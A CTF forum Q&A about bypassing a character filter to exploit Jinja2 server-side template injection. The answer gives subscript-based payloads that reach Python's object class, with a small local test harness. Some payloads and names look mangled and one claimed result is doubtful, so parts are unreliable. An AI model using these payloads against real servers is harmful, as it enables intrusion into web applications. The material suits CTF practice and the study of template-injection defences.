# Jinja2 SSTI filter bypasses

Tags: jinja2, exploit, ctf

I'm doing a [Capture The Flag (CTF)](https://en.wikipedia.org/wiki/Capture_the_flag_(cybersecurity)) and I'm trying to exploit a server vulnerable to Jinja2 [Server Side Template Injection (SSTI)](https://en.wikipedia.org/wiki/Code_injection#Server_Side_Template_Injection).
I can't use the following characters: `\`, `|`, `,`, `.` and `_`.
I'm trying to write the following command:

```
{{''.class.mro()[1].subclasses()}}
```

Any ideas?

I tried using the `attr` method, but I can't use it because of the limitation of using `|` and `.`.

Answer (score 5):

Most of what you need here is probably explained in the [*"Variables"* chapter and further explained in the *"Implementation"* note](https://jinja.palletsprojects.com/en/3.1.x/templates/#notes-on-subscriptions):

> You can use a dot (`.`) to access attributes of a variable in addition to the standard Python `__getitem__` “subscript” syntax (`[]`).
>
> The following lines do the same thing:
>
> ```
> {{ foo.bar }}
> {{ foo['bar'] }}
> ```

<sup>*Source: https://jinja.palletsprojects.com/en/3.1.x/templates/#variables*</sup>

Then, later:

> `foo['bar']` works mostly the same with a small difference in sequence:
>
> - check for an item `'bar'` in *foo*. (`foo.__getitem__('bar')`)
> - if there is not, check for an attribute called bar on *foo*. (`getattr(foo, 'bar')`)
> - if there is not, return an undefined object.

<sup>*Source: https://jinja.palletsprojects.com/en/3.1.x/templates/#notes-on-subscriptions*</sup>

So, if I try this kind of thing on a Jinja environment:

```
{{ ''['__class__']['mro']()[1] }}
```

I do indeed get a `<class 'object'>` as a return.

Here, I was not able to achieve `''['class']`, but I can achieve it using `dict['class']`, on the other hand:

```
{{ dict['class']['mro']()[1] }}
```

As for the call to the `.subclasses()` method, it is unclear if this comes from your example implementation or from somewhere else.

---

Testing environment:

```
├── jinja.py
└── templates
    └── template.html.j2
```

*jinja.py*:

```py
from jinja2 import Environment, FileSystemLoader

environment = Environment(loader=FileSystemLoader('templates/'))
template = environment.get_template('template.html.j2')
print(template.render())
```

*templates/template.html.j2*:

```
{{ dict['class']['mro']()[1] }}
```

Output:

```
<class 'object'>
```